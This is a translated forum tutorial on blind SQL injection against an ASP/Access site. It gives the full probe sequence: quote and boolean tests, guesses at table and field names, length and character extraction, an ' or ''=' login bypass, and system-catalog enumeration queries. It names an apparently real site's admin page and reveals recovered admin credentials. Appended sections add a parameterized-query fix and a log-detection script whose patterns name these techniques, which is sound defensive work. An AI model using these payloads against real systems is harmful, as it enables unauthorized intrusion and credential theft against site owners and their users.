TAG: SQL injection basics
Explanation: I will say it once more: please don't use this to do malicious damage, we are only learning. The example I gave everyone last time, which I was going to use for the animation, has already been patched. Ugh ... that hurt. I found another one.
Good, let's start below .....
1. Judgment
Use ' , and 1=1 , and 1=2
Judgment is very important and is the main step, because if you don't judge first ...

Adding ' returns:
    Microsoft JET Database Engine error '80040e14'
    Syntax error (missing operator) in query expression 'ID = 544'''.
    /jiaren.asp, line 15

Adding and 1=1 returns the normal page.

Adding and 1=2 returns the error page:
    ADODB.Field error '800a0bcd'
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    /jiaren.asp, line 28

At this point many friends will ask: why does that mean there is an injection? Hehe, just remember that we judge by the difference between the pages that come back. As long as the two probes return different pages, you can tell.
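The judgment step works because the id from the request is pasted straight into the SQL text, so "and 1=1" and "and 1=2" become part of the query and produce different pages. As an added example (my own code, not from this tutorial or from the site it discusses), the following Python script reproduces that on an in-memory SQLite table standing in for the Access database, next to the parameterized lookup a maintainer should use instead. The table, its row, and the lookup_vulnerable / lookup_parameterized / probe_differs names are constructed assumptions. With the hardened lookup both probes return the same thing, so the judgment test has nothing to distinguish.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Access database behind jiaren.asp:
    one table looked up by numeric id (the 'ID = 544' in the page's error)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO article VALUES (544, 'sample article')")  # constructed row
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The pattern behind '/jiaren.asp, line 15': the request value is pasted
    into the SQL text. Returns the row, None when no record matches (the
    BOF/EOF error page), or the parser's error text (the Jet syntax error)."""
    sql = "SELECT id, title FROM article WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_parameterized(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: check the type first, then bind the value as a parameter
    so it is only ever compared, never parsed as SQL."""
    if not raw_id.isdigit():
        return None  # reject anything that is not a plain integer id
    return conn.execute(
        "SELECT id, title FROM article WHERE id = ?", (int(raw_id),)
    ).fetchone()


def probe_differs(lookup, conn: sqlite3.Connection) -> bool:
    """The page's judgment test: does 'and 1=1' give one page and 'and 1=2'
    another? True means the two probes are distinguishable, i.e. the value
    reached the SQL parser and the lookup is injectable."""
    true_probe = lookup(conn, "544 and 1=1")
    false_probe = lookup(conn, "544 and 1=2")
    return true_probe != false_probe


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(name, "injectable:", probe_differs(fn, db))
        print("  ' probe ->", fn(db, "544'"))
```

The type check before binding is what turns the three probes into one identical outcome; binding alone would already stop the value from being parsed, but rejecting non-numeric ids also keeps the error page (and its database error text) from ever being shown to the client.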
2. Guess the table name. This is the most basic query statement and the one people talk about most. I'll describe what the statement does; for its exact meaning, please look it up in SQL references.
    and 0<>(select count(*) from admin)   --- judges whether the table admin exists
Here only the table name changes; the other parts stay the same. If it returns the correct page, that tells us the table exists. If it returns an error, it doesn't, and we change to another name, such as: and 0<>(select count(*) from user). Of course, you can try anything you think of. I gave two tips in class and didn't expect that so many people only knew those two; they asked me whether only admin and user can be used and nothing else. Comrades, admin and user can be replaced. But not with any name you feel like. Because you are guessing, there has to be a line of thought; guessing isn't random. Is 123 or 456 any use? No, because nobody gives a table a name like that. The usual table names are nothing more than admin, adminuser, user, pass, password and so on ..
3. Guess the number of records
    and 0<(select count(*) from admin)
Everyone will notice this statement is almost the same as the one above. Hehe, the subquery part is identical to the previous one; only the number in front changes. That number is for finding out how many user accounts there are, so it has to change; it is not fixed at 1. Because we are guessing, we don't yet know how many accounts are in the table, so if you fix it you won't be able to guess, huh.

4. Guess the field names
    and 1=(select count(*) from admin where len(name)>0)       --- the user field name
    and 1=(select count(*) from admin where len(password)>0)   --- the password field name
These test the field names inside the table.
    and 1=(select count(*) from admin where len(*)>0)   --- This is the core statement, the common template.
What we do is put the field name we are thinking of inside the parentheses of len(). First guess the username field: I use name, OK. Then guess the password field: I first used pass, dizzy, wrong; change it again, password, looks OK. Now we have the user field and the password field. Below are the length and the specific characters.

5. Guess the length of each field
Still deal with and 1=(select count(*) from admin where len(*)>0): replace >0 with other comparisons and keep guessing until =? returns the correct page. Good, let's get started. First the account length; the account field is name:
    and 1=(select count(*) from admin where len(name)>0)   correct
    and 1=(select count(*) from admin where len(name)>1)   correct
    and 1=(select count(*) from admin where len(name)>2)   correct
    and 1=(select count(*) from admin where len(name)>6)   error
    and 1=(select count(*) from admin where len(name)>5)   correct
    and 1=(select count(*) from admin where len(name)>4)   correct
So we can tell the length is 6:
    and 1=(select count(*) from admin where len(name)=6)   correct
Huh, =6 returns the correct page.

Below is the length of the password field:
    and 1=(select count(*) from admin where len(password)>0)    correct
    and 1=(select count(*) from admin where len(password)>6)    correct
    and 1=(select count(*) from admin where len(password)>10)   correct
    and 1=(select count(*) from admin where len(password)>15)   error
    and 1=(select count(*) from admin where len(password)>14)   error
    and 1=(select count(*) from admin where len(password)>13)   error
    and 1=(select count(*) from admin where len(password)>12)   error
    and 1=(select count(*) from admin where len(password)>11)   correct
OK, the length is 12. name 6, password 12. The lengths are out; below are the specific characters.

6. Guess the characters
    and 1=(select count(*) from admin where left(name,1)='a')       --- guess the user
    and 1=(select count(*) from admin where left(password,1)='a')   --- guess the password
Like this, add one character per guess; when you have guessed as many characters as the length, the account comes out. In left(name,1)='a', the 1 is the position of the character you want to guess.
    and 1=(select count(*) from admin where left(name,1)='a')    --- guess the first character
    and 1=(select count(*) from admin where left(name,2)='ab')   --- the second character of the user account; guess the rest the same way.
    and 1=(select count(*) from admin where left(name,1)='a')   error
    .....
    and 1=(select count(*) from admin where left(name,6)='PCLZYQ')   correct
Because this guessing process is rather long, I'll give the answer directly.
    and 1=(select count(*) from admin where left(password,1)='a')   error
    .......
    and 1=(select count(*) from admin where left(password,12)='PCLZYQ000215')   correct
So name = PCLZYQ, password = PCLZYQ000215.

7. Find the login page and log in. Common login pages: admin.asp, admin_index.asp, admin/index.asp, admin/admin.asp .... You can collect more yourself ..
Don't forget to put them in a text file. Hehe ^_^ Here we have http://www.talewin.com/admin.asp, and we log in there. Hehe, the person who wrote this program is also very careless, because his login page has yet another problem: use ' or ''=' and see, you can get in.

Notes:
    Command: select             Meaning: selection    Description: used to find the records you need
    Aggregate function: count   Meaning: quantity     Description: used to count how many
    Keyword: from               Meaning: data table   Description: used to specify the data table
    Keyword: where              Meaning: condition    Description: used to set conditions
    Operator: and               Meaning: and          Description: logical and
    top   --- take the first specified number of rows: select top 10 * from .....
    and 1=(select count(*) from admin where asc(mid(pass,5,1))=51)   --- This query statement can guess Chinese usernames and passwords. Just swap the number after = for the ASCII code; finally convert the result back into characters.
The animation ends here; I think it is very clear. If anyone doesn't understand, you can ask me and I'll answer.
Get all database names and storage paths:   select name, filename from master.dbo.sysdatabases
Get all table names of a database:          select * from master.dbo.sysobjects where xtype='u'
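Seen from the server side, the whole procedure from the judgment step through the length and character guessing, the ' or ''=' login trick and the sysdatabases / sysobjects queries in the notes leaves a very recognisable trail in the web server log: one client hammering one page with query strings that contain and 1=1, select count(*), len(), left(), asc(mid()), while the status code keeps flipping between the normal page and the error page. As an added example that is not part of the original tutorial, this Python script runs that detection over a handful of constructed IIS-style log lines that replay the sequence above against /jiaren.asp; the log layout, the rule labels, the client addresses and the alert thresholds are all my own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# One client replays the tutorial's probes; a second client is an ordinary visitor.
SAMPLE_LOG = """\
2024-05-01 10:00:01 203.0.113.7 GET /jiaren.asp id=544 200
2024-05-01 10:00:02 203.0.113.7 GET /jiaren.asp id=544' 500
2024-05-01 10:00:03 203.0.113.7 GET /jiaren.asp id=544+and+1%3D1 200
2024-05-01 10:00:04 203.0.113.7 GET /jiaren.asp id=544+and+1%3D2 500
2024-05-01 10:00:05 203.0.113.7 GET /jiaren.asp id=544+and+0%3C%3E(select+count(*)+from+admin) 200
2024-05-01 10:00:06 203.0.113.7 GET /jiaren.asp id=544+and+1%3D(select+count(*)+from+admin+where+len(name)%3E5) 200
2024-05-01 10:00:07 203.0.113.7 GET /jiaren.asp id=544+and+1%3D(select+count(*)+from+admin+where+left(name,1)%3D'a') 500
2024-05-01 10:00:08 203.0.113.7 GET /jiaren.asp id=544+and+1%3D(select+count(*)+from+admin+where+asc(mid(pass,5,1))%3D51) 200
2024-05-01 10:00:09 198.51.100.4 GET /jiaren.asp id=545 200
"""

# One rule per technique the tutorial walks through; the labels are my own.
RULES = [
    ("boolean probe",       re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("subquery count",      re.compile(r"\(\s*select\s+count\s*\(\s*\*\s*\)\s+from\b", re.I)),
    ("length guess",        re.compile(r"\blen\s*\(\s*\w+\s*\)\s*[<>=]", re.I)),
    ("character guess",     re.compile(r"\b(left|mid|asc)\s*\(", re.I)),
    ("auth bypass quote",   re.compile(r"'\s*or\s*'", re.I)),
    ("catalog enumeration", re.compile(r"\bsys(objects|databases)\b", re.I)),
]
STRAY_QUOTE = re.compile(r"^\d+'$")  # a numeric id with a quote appended (the ' test)

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def classify(query: str) -> list[str]:
    """Names of every rule that matches the URL-decoded query string."""
    decoded = unquote_plus(query)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    for part in decoded.split("&"):          # the stray-quote rule is per parameter value
        if STRAY_QUOTE.match(part.partition("=")[2]):
            hits.append("stray quote")
            break
    return hits


def analyze(log_text: str) -> dict:
    """Group requests by (client, page) and summarise the injection signals:
    how many requests matched a rule, which techniques appeared, and how often
    the status code flipped between consecutive requests, which is the
    'normal page vs error page' difference the whole technique depends on."""
    summary = defaultdict(lambda: {"flagged": 0, "techniques": set(),
                                   "status_flips": 0, "last_status": None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # skip lines that are not in the expected layout
        _ts, client, _method, page, query, status = m.groups()
        entry = summary[(client, page)]
        hits = classify(query)
        if hits:
            entry["flagged"] += 1
            entry["techniques"].update(hits)
        if entry["last_status"] is not None and entry["last_status"] != status:
            entry["status_flips"] += 1
        entry["last_status"] = status
    return dict(summary)


def suspicious(summary: dict, min_flagged: int = 3, min_flips: int = 2) -> list[tuple[str, str]]:
    """Client/page pairs that both sent repeated injection-shaped queries and
    saw the response flip between success and error."""
    return sorted(key for key, v in summary.items()
                  if v["flagged"] >= min_flagged and v["status_flips"] >= min_flips)


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for key in suspicious(result):
        print(key, sorted(result[key]["techniques"]),
              "flagged:", result[key]["flagged"], "flips:", result[key]["status_flips"])
```

The per-request rules on their own would also fire on a single curious visitor; combining them with the count of flagged requests and the status flips from the same client on the same page is what singles out the guessing loop, which needs dozens of alternating 200/500 responses to recover even one six-character field.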